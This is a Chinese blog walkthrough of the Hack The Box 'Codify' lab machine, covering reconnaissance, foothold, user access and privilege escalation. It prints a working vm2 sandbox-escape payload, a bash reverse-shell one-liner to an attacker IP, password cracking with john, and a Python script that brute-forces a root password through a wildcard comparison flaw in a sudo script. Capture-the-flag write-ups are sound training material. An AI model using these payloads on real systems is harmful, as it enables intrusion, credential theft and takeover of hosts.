HTB靶场-Codify

最新推荐文章于 2024-04-25 10:19:58 发布
最新推荐文章于 2024-04-25 10:19:58 发布
阅读量927 收藏 19
点赞数 18
分类专栏: 打靶 文章标签: 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yc11223344/article/details/135409983
版权
  • 本人自己的打靶记录,会有错误的地方,尽情谅解,欢迎指出错误和不解的地方,让我们共同进步!

在这里插入图片描述

信息收集

端口扫描

nmap -sV 10.10.11.239

在这里插入图片描述
22,80端口开放
访问80端口发现需要host绑定

sudo vi /etc/hosts

在这里插入图片描述
页面显示是node.js的沙箱
在这里插入图片描述
点击Try it now进入到编辑页面
在这里插入图片描述

nodejs沙箱逃逸漏洞

搜索node.js沙箱的漏洞发现一个沙箱逃逸漏洞

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("whoami").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;
console.log(vm.run(code)); // -> hacked

在这里插入图片描述

反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.14.27/2345 0>&1

在这里插入图片描述
在/var/www/contact下面发现了一个数据库文件
在这里插入图片描述
打开tickets.db
在这里插入图片描述
发现了joshua用户的密码
把hash值保存在hash.txt中
在这里插入图片描述
进行破解hash值

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

在这里插入图片描述

注意:有的kali里面没有wordlists文件,需要我们进行下载

ssh连接

使用ssh进行登录

ssh joshua@10.10.11.239
在输入密码

取得user的flag

在这里插入图片描述

提权

sudo -l

在这里插入图片描述
发现有一个文件可以运行
打开文件进行查看
在这里插入图片描述
这里出现了问题

  • 脚本的这一部分将用户提供的密码 (USER_PASS) 与实际数据库密码 (DB_PASS) 进行弱比较
  • 执行模式匹配而不是直接字符串比较

所以可以使用脚本进行模糊匹配

import string
import subprocess
 
all = list(string.ascii_letters + string.digits)  # 创建包含所有字母和数字的字符列表
password = ""  # 初始化密码为空字符串
found = False  # 初始化 found 变量为 False,表示密码尚未找到
 
while not found:
    for character in all:
        # 构建要执行的命令
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        
        # 使用 subprocess.run 执行命令,并获取标准输出
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout
 
        # 如果输出包含 "Password confirmed!" 字符串,表示密码中的字符是正确的
        if "Password confirmed!" in output:
            password += character  # 将当前字符添加到密码中
            print(password)  # 打印当前破解出的密码
            break  # 跳出字符循环,继续下一个字符的尝试
    else:
        found = True  # 如果 for 循环正常结束,表示已找到密码的所有字符
 
# 循环结束后,输出找到的密码
print("Found Password:", password)

脚本是借助大佬写好的,因为代码能力有限只能先做一个脚本小子
创建一个py文件
在这里插入图片描述
执行文件,得到密码
在这里插入图片描述
进行root登录
在这里插入图片描述

总结

  1. 通过node.js的沙箱逃逸漏洞进行gatshell
  2. 在/var/www/contact下发现数据库文件,拿到用户名和密码
  3. ssh连接后取得普通用户的flag
  4. 通过可执行文件进行提权,拿到root的密码

参考文章

nodejs沙箱逃逸漏洞:https://blog.csdn.net/m0_66859164/article/details/132408835

hang0c
关注
  • 18
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTB靶场 Shared
weixin_45682839的博客
08-22 2062
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
HTB靶场系列 linux靶机 靶机cronos
m0_57221101的博客
01-19 1710
勘探 基本操作先用nmap扫一下 nmap 10.10.10.13 Starting Nmap 7.80 (https://nmap.org) at 2020-04-07 21:01 EDT Nmap scan report for 10.10.10.13 Host is up (0.014s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain ..
HTB靶场 Perfection
最新发布
m0_62438849的博客
04-25 790
其余恶意代码=echo+[payload]|+base64+-d+|+bash (+表示空格)总的 category1=%25>;写一段反弹shell代码#!经过base64编码。
HTB靶场使用教程
鹧鸪的起点
07-25 1137
简单介绍下HTB注册教程
HTB靶场系列 linux靶机 Node靶机
m0_57221101的博客
01-13 1727
勘探 nmap > nmap 10.10.10.58 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 10:58 EDT Nmap scan report for 10.10.10.58 Host is up (0.31s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp Nmap
HTB靶场系列 linux靶机 Nineveh靶机
m0_57221101的博客
01-17 4338
勘探 nmap勘探 nmap -sC -sV 10.10.10.43 Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST Nmap scan report for 10.10.10.43 Host is up (0.36s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
htb21-reg:htb 2021注册引擎
05-20
HTB 7注册门户 什么? 这是一个允许compsoc委员会成员使用我们现有的google admin平台登录内部应用程序的工具。 为什么? 这使我们可以极大地减少启动新应用程序的开销,因为我们可以将帐户管理移交给长期受苦的...
HTB[-tools] Config Generator-开源
05-06
HTB-tools配置生成器是一个脚本,可以使您的生活变得轻松。 您只需5分钟即可生成一个完整IP地址类别的配置文件。 您可以自定义任何内容,只需使用它即可:)
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Solutions
03-09
HTB-Solutions
HTB setup script-开源
05-02
HTB.init是从CBQ.init派生的Shell脚本,它允许在Linux上轻松设置基于HTB的流量控制。 HTB(分层令牌桶)是一种新的排队规则,它试图解决当前CBQ实施中的弱点。
HTB_tools-开源
05-02
Whit htb-tools可以简化上传和下载的带宽分配的配置和监视。
my-htb-tools3
03-19
my-htb-tools3
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB靶场系列 Windows靶机 Arctic靶机
m0_57221101的博客
01-30 2606
这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机 勘探 nmap nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST Nmap scan report for 10.10.10.11 Host is up (0.28s latency). Not shown: 65532 filtered ports PORT
HTB Legacy[Hack The Box HTB靶场]writeup系列2
重新启程
02-01 1564
Retired Machines的第二台,前面的靶机都是比较简单的,通常都是适应性的训练,找到合适的突破点就可以了。 目录 0x00 靶场介绍 0x01 端口扫描 0x02 samba服务 0x03永恒之蓝 0x00 靶场介绍 Legacy这台靶机是windows靶机,我们之前在Vulnhub上使用的靶机基本上都是linux操作系统。那么我们就来看看这台靶机是什么情况。 先看下...
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值